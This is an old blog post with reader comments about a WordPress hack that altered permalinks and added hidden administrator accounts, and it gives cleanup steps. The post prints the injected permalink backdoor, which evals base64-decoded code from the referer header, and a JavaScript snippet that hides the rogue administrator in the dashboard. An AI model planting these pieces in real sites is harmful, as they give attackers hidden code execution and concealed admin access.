WordPress Code At The End Of URLs, Hack?

| Posted by watashii | Filed under WordPress

permalink

http://blog.watashii.com/2009/09/05/wordpress-code-at-the-end-of-urls-hack/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Possibly a new WordPress hack happening at the moment?  Just got this weird code appended at the end of every URL on my WordPress blog.  This is due to the Permalink Settings being changed to a custom one.  To revert it back, simply go to your [Dashboard > Settings > Permalink], and revert the Custom Structure back to your original default option.

I’ve also noticed there is a few more users (a new Administrator and a bunch of Subscribers) being added by this hack [Dashboard > Users]. You may also notice the new administrator user is hidden from display.  What I did was to view the page source to pull their User ID.  Then edit this user to demote it to a subscriber (http://your_blog_url/wp-admin/user-edit.php?user_id=XXX), and rename their javascripted first name.  Thereafter deleted these extra subscribers.

Also I upgraded to the latest version WP 2.8.4 from 2.7.

Follow discussion here.

…         <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){     try{         var t=document.getElementById(“user_superuser”);         while(t.nodeName!=”TR”){             t=t.parentNode;         };         t.parentNode.removeChild(t);         var tags = document.getElementsByTagName(“H3″);         var s = ” shown below”;         for (var i = 0; i < tags.length; i++) {             var t=tags[i].innerHTML;             var h=tags[i];             if(t.indexOf(s)>0){                 s =(parseInt(t)-1)+s;                 h.removeChild(h.firstChild);                 t = document.createTextNode(s);                 h.appendChild(t);             }         }         var arr=document.getElementsByTagName(“ul”);         for(var i in arr) if(arr[i].className==”subsubsub”){             var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);             if(n[1]>0){                 var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<”);         arr[i].innerHTML=txt;         }     }           }catch(e){};      };      addLoadEvent(setUserName); </script></div>

Share:

  • Digg
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Print
  • email

Related Posts:

  1. Upgrading to WordPress 2.7 Coltrane
  2. Wordpress Syntax Highlighter

Tags: , ,

Permalink | September 4th, 2009

5 Responses to “WordPress Code At The End Of URLs, Hack?”

  1. Emily Green Says:
    September 4th, 2009 at 3:45 pm

    The same thing started happening on mine. Your advice corrected it. Thank you!

  2. Up and running | Chance of Rain Says:
    September 4th, 2009 at 3:58 pm

    [...] find the problem. For other WordPress users who experienced junk code corrupting their links, the Hero under the Sink who fixed it with simple, clear instructions can be found by clicking on the cartoon. Category: [...]

  3. Matt Coogan Says:
    September 7th, 2009 at 5:55 pm

    I too had the same hack. I deleted the hidden admin user from the mysql admin page from my host. I then deleted all users that we suspected as spammer hackers (from a wordpress forum post)

    Do you think that is sufficent to get rid of the hack or should i have followed your method. I am a first time hacking victim.

    thanks for the helpful info.

  4. watashii Says:
    September 8th, 2009 at 12:24 am

    From wordpress support, it suggests to upgrade to 2.8.4. The hack was known to occur only on all older versions.

  5. kurye Says:
    September 14th, 2009 at 8:30 pm

    very nice great post :)

Leave a Reply